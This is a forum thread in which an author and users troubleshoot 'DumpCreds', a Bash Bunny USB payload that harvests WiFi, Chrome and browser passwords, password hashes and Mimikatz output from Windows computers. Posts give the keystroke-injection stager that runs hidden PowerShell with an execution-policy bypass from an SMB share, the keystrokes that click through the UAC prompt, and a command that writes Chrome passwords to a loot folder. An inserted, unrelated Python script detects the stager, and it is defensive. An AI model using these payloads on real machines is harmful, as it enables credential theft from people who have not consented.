qdba (Author) Posted April 3, 2017 (edited)

New Version 2.0.2

Changelog:
- Parallelize the PowerSploit script, so the payload is faster.
- Universal payload. The payload works no matter if there is a UAC prompt or a credentials prompt.

There is no kind of exploitation. You will not get admin rights if you didn't have them before. But without admin rights WifiDump, BrowserDump and Computerinformation work fine. Only for Hashdump and M1m1k@tz you need admin rights.

Install: Copy all files to your switch directory. Don't forget the PS folder.

Download: See first post.

Edited April 3, 2017 by qdba
illwill Posted April 3, 2017 (edited)

[Post removed: Violation of CoC]

Edited October 8, 2017 by illwill
qdba (Author) Posted April 3, 2017

36 minutes ago, illwill said:
    I haven't tested yours, but with chromecreds I had an issue with it truncating the URLs with "..." if they were too long. This is how I solved it:
    Get-ChromeCreds | ft UserURL, Password -AutoSize | Out-File $LOOTDIR\Chrome.txt -width 250

Thank you for the information. But it didn't work for me, because I start every process in its own PowerShell environment with Start-Job. I know there are a lot of other ways. But for me it was the fastest and easiest. :-)
illwill Posted April 3, 2017 (edited)

[Post removed: Violation of CoC]

Edited October 8, 2017 by illwill
jafahulo Posted April 3, 2017

5 minutes ago, illwill said:
    Are your chrome results truncated?

Mine are as well.
Hectortxz Posted April 4, 2017

I tried it on Windows 8.1 and purple kept blinking slow for 5 minutes. I'm doing something wrong.
jafahulo Posted April 4, 2017

Just now, Hectortxz said:
    I tried it on Windows 8.1 and purple kept blinking slow for 5 minutes. I'm doing something wrong.

Are you in the US? If so, change the keyboard language to US, and the bypass UAC letter to "y".
Decoy Posted April 4, 2017

Just now, Hectortxz said:
    I tried it on Windows 8.1 and purple kept blinking slow for 5 minutes. I'm doing something wrong.

Is it a slow blink or a fast blink? Is your SMB server kicking off? Does the BB have an IP?
Hectortxz Posted April 4, 2017

47 minutes ago, Decoy said:
    Is it a slow blink or a fast blink? Is your SMB server kicking off? Does the BB have an IP?

It's a slow blink. I think it's my IP. I set it to 172.16.64.1 and 255.255.255.0, but it'll turn red when I try the payload. If my computer tries to automatically get the IP, it blinks a slow purple for 5 minutes.
Hectortxz Posted April 4, 2017

52 minutes ago, jafahulo said:
    Are you in the US? If so, change the keyboard language to US, and the bypass UAC letter to "y".

Change it in the payload?
qdba (Author) Posted April 4, 2017 (edited)

9 hours ago, illwill said:
    Are your chrome results truncated?

In Version 2.0.2 it works. In older versions they are truncated.

Edited April 4, 2017 by qdba
qdba (Author) Posted April 4, 2017 (edited)

3 hours ago, Hectortxz said:
    It's a slow blink. I think it's my IP. I set it to 172.16.64.1 and 255.255.255.0, but it'll turn red when I try the payload. If my computer tries to automatically get the IP, it blinks a slow purple for 5 minutes.

If you set the IP manually, the variable TARGET_IP will not be set by the bunny_helpers.sh script. So the check whether there is a target IP fails and it blinks red. I'm working on an extended version of bunny_helpers.sh. It's not an error of the payload.

If the LED blinks slow purple, the payload is waiting for the smbserver and the handshake. Is a direct connection with Explorer to \\172.16.64.1\e working? If yes, does it work when you start the script main.ps1 manually (enter "powershell -exec bypass \\172.16.64.1\e\main.ps1" in a cmd shell)?

Be sure you have the latest files (payload.txt, main.ps1 and the folder PS). There are some timing problems in early versions of payload.txt.

Edited April 4, 2017 by qdba
Decoy Posted April 4, 2017

3 hours ago, Hectortxz said:
    Change it in the payload?

Yes, you need to change the keyboard layout to US if you are in the US, and change the UAC bypass key to "y".
jafahulo Posted April 4, 2017

11 hours ago, Hectortxz said:
    Change it in the payload?

Yes, it should look something like this:

    # HID STAGE
    # Runs minimized powershell waiting for Bash Bunny to appear as 172.16.64.1.
    LED R G B
    ATTACKMODE HID
    Q SET_LANGUAGE US

and:

    # Bypass UAC :: Change "ALT j" according to your language i.e. for us it is ALT o
    Q DELAY 1000
    Q ALT y
    Q DELAY 500
    Q ENTER
qdba (Author) Posted April 4, 2017

After a firmware reset this afternoon, I ran into trouble with smbserver.py. It didn't start. The purple LED blinks slow. After some tests I realized that after running the tools_installer the things were installed fine, but smbserver.py had ^M at the end of every line. I removed it in vi with

    :1,$s/<CTRL-v><CTRL-M>//g

or with the commands

    cd /pentest/impacket/examples
    cp smbserver.py smbserver.py.sik
    cat smbserver.py.sik | sed 's/\r$//g' >smbserver.py

Now it works again.
getJackt Posted April 4, 2017

What output are you supposed to get with chromecreds? All I see is passwords and the URL, but they don't seem to be lining up properly.
Hectortxz Posted April 5, 2017

20 hours ago, Decoy said:
    Yes, you need to change the keyboard layout to US if you are in the US, and change the UAC bypass key to "y".

I changed the payload for the US and I pinged my IP at 172.16.64.1 and it came back good. It just doesn't pass the slow purple blink.
qdba (Author) Posted April 5, 2017

1 hour ago, Hectortxz said:
    I changed the payload for the US and I pinged my IP at 172.16.64.1 and it came back good. It just doesn't pass the slow purple blink.

Can you connect to \\172.16.64.1\e from Explorer? Is the smbserver.py running (ssh to the Bunny and do a "ps -ef | grep smb")? If not, see my post above. There is an error in the Impacket installed by tools_installer.
Altao Posted April 5, 2017

Hi,

can you post a working smbserver.py? I tried nearly everything: a firmware reset, your command. The slow purple blink is still the problem.

I can connect to \\172.16.64.1\e. If I run "powershell -exec bypass \\172.16.64.1\e\main.ps1" it works.

If I do "ps -ef | grep smb":

    root  693    1   3 16:00 ?     00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2
    root 1393  967   0 16:06 pts/0 00:00:00 grep smb

And I have a German keyboard. What's my mistake?

Greetings
qdba (Author) Posted April 5, 2017

16 minutes ago, Altao said:
    Hi, can you post a working smbserver.py? I tried nearly everything: a firmware reset, your command. The slow purple blink is still the problem. I can connect to \\172.16.64.1\e. If I run "powershell -exec bypass \\172.16.64.1\e\main.ps1" it works. If I do "ps -ef | grep smb":
        root  693    1   3 16:00 ?     00:00:14 python /pentest/impacket/examples/smbserver.py e /root/udisk/payloads/switch2
        root 1393  967   0 16:06 pts/0 00:00:00 grep smb
    And I have a German keyboard. What's my mistake? Greetings

Are you using Version 2.0.2? Is there a UAC prompt or a credential prompt? I guess there is a timing problem, so the main.ps1 script will not start.

    LED R G
    # Wait for Bunny Ethernet and Start main.ps1 Powershell Script
    Q DELAY 500                <<<<<<<<<<<<<<<<<< Increment to 1500 for testing
    Q STRING "powershell \"while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) { sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\\172.16.64.1\e\main.ps1; exit } }\""
    Q DELAY 1000
    Q ENTER

Does the main.ps1 script fire up right? Can you see the command in the console? Take care that no other window is open on the screen. Works best on a pure desktop.
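A defender-side companion to the stager command quoted in the post above, added here and not part of the thread or the DumpCreds payload: that command line has a recognisable shape in process-creation telemetry (a busy-wait on a host IP, then hidden PowerShell with -ExecutionPolicy Bypass running a .ps1 from an IP-addressed UNC share), and the sketch below scores command lines for those traits. The sample command lines, indicator names and alert rule are constructed for this example.

```python
import re
from typing import List, Tuple

# Constructed command lines standing in for process-creation telemetry (4688 / Sysmon 1), not captured data.
SAMPLE_CMDLINES = [
    r'powershell "while (1) { If (Test-Connection 172.16.64.1 -count 1 -quiet) '
    r'{ sleep 2; powershell -WindowStyle Hidden -ExecutionPolicy Bypass '
    r'-File \\172.16.64.1\e\main.ps1; exit } }"',
    r'powershell -WindowStyle Hidden -ExecutionPolicy Bypass -File \\172.16.64.1\e\main.ps1',
    r'powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1',
    r'powershell -NoProfile -File \\fileserver01\deploy\install.ps1',
]

# Traits of the stager quoted in the thread, each as its own pattern.
UNC_SCRIPT = re.compile(r'-File\s+\\\\([^\\\s"]+)\\[^\s"]*\.ps1', re.IGNORECASE)
EXEC_BYPASS = re.compile(r'-(?:ExecutionPolicy|ep|exec)\s+Bypass', re.IGNORECASE)
HIDDEN_WINDOW = re.compile(r'-WindowStyle\s+Hidden', re.IGNORECASE)
PING_WAIT_LOOP = re.compile(r'while\s*\(1\).*Test-Connection\s+\d{1,3}(?:\.\d{1,3}){3}', re.IGNORECASE | re.DOTALL)
IPV4 = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')

def indicators(cmdline: str) -> List[str]:
    """Return the stager traits present in one PowerShell command line."""
    found = []
    unc = UNC_SCRIPT.search(cmdline)
    if unc:
        found.append("unc_script")
        if IPV4.match(unc.group(1)):
            found.append("unc_host_is_ip")  # share addressed by a bare IP, not a name
    if EXEC_BYPASS.search(cmdline):
        found.append("execpolicy_bypass")
    if HIDDEN_WINDOW.search(cmdline):
        found.append("hidden_window")
    if PING_WAIT_LOOP.search(cmdline):
        found.append("ping_wait_loop")
    return found

def is_suspicious(cmdline: str) -> bool:
    """Alert on the wait-for-host loop, or on a policy bypass that runs a script from an
    IP-addressed share; a bypass on a local path alone is too common to alert on by itself."""
    found = set(indicators(cmdline))
    return "ping_wait_loop" in found or {"unc_host_is_ip", "execpolicy_bypass"} <= found

def triage(cmdlines: List[str]) -> List[Tuple[str, List[str]]]:
    """Keep only the command lines worth an analyst's attention, paired with their traits."""
    return [(c, indicators(c)) for c in cmdlines if is_suspicious(c)]

if __name__ == "__main__":
    for cmd, traits in triage(SAMPLE_CMDLINES):
        print(traits, cmd)
```

Of the four constructed lines only the two that fetch the script from the IP-addressed share are flagged; the local-path bypass and the named-server deployment script are left alone.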
Altao Posted April 5, 2017

Hi,

I use DumpCreds 2.0.2 Build 1003. I tried your delay, still the same problem. I see -.+.! wifi-creds..... and the rest, and at last very briefly a red script part, but too short.

Greetings
qdba (Author) Posted April 5, 2017

7 minutes ago, Altao said:
    Hi, I use DumpCreds 2.0.2 Build 1003. I tried your delay, still the same problem. I see -.+.! wifi-creds..... and the rest, and at last very briefly a red script part, but too short. Greetings

OK, that helps a lot. So the handshake thing works fine. Now the error message would be helpful. For very fast vanishing error messages I use a trick: I make a video with the smartphone and step forward slowly by hand until the error message is visible.
Altao Posted April 5, 2017

I got a very good txt file. I'll try a screening tomorrow, okay?

Greetings
PoSHMagiC0de Posted April 6, 2017

4 hours ago, qdba said:
    OK, that helps a lot. So the handshake thing works fine. Now the error message would be helpful. For very fast vanishing error messages I use a trick: I make a video with the smartphone and step forward slowly by hand until the error message is visible.

Just modify the script to have a verbose or debug option and then have it fire off with the debug switch. For parts that may have errors I usually wrap them in a try, and in the catch I log to a local file if the debug flag is used. Helps during testing.

Better yet, do not run the script hidden. Go to cmd and run his stager without the windowstyle option. Or launch PowerShell, take the code after the -C in his PowerShell command and run it straight. You should then have the PS session still open to scroll back through the errors.
qdba (Author) Posted April 9, 2017

DumpCreds_2.1 New Version

Changelog:
- Completely new payload.txt code for BashBunny 1.1
- Added a lot of debug code to the payload. For debugging create a file "DEBUG" in the payload folder. You get the debug log in \loot\Dumpcreds_2.1
- Impacket.deb included for easy Impacket installation
- Some Ducky languages included (from the DuckyInstall payload)